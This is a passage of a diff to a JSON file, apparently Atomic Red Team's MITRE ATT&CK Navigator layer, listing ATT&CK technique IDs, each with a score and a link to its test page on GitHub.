yco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1572","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}
\ No newline at end of file
+{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T